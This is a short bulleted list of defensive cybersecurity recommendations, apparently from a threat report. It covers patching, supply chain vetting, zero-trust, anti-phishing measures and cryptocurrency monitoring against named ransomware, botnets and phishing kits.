- Enhance international collaboration to disrupt cybercrime infrastructure and enforce sanctions against bulletproof hosting providers, focusing on financial nodes and cross-border legal frameworks.
- Prioritize supply chain security through stricter vetting of third-party integrations, open-source registries, and software updates to counter hijacking and registry pollution campaigns.
- Adopt zero-trust architectures and AI-driven anomaly detection to mitigate insider threats, credential theft, and evolving ransomware tactics like Akira and RansomHouse.
- Invest in proactive defense against AI-powered threats, including autonomous attack agents and generative document forgery, with tailored detection models and ethical AI governance.
- Accelerate patch management for critical vulnerabilities (e.g., WSUS, Chrome V8, FortiWeb) and enforce network segmentation to limit lateral movement in hypervisor and cloud environments.
- Replace end-of-life IoT/SOHO devices vulnerable to state-sponsored botnets (e.g., WrtHug, AyySSHush) and mandate manufacturer accountability for pre-installed bloatware and firmware security.
- Strengthen anti-phishing measures with multi-factor authentication (MFA), browser isolation, and user training to counter advanced PhaaS kits like Sneaky2FA and mobile trojans like Sturnus.
- Expand cryptocurrency transaction monitoring and regulatory oversight to counter mixing services, cryptojacking, and laundering via compromised wallets and mining campaigns.
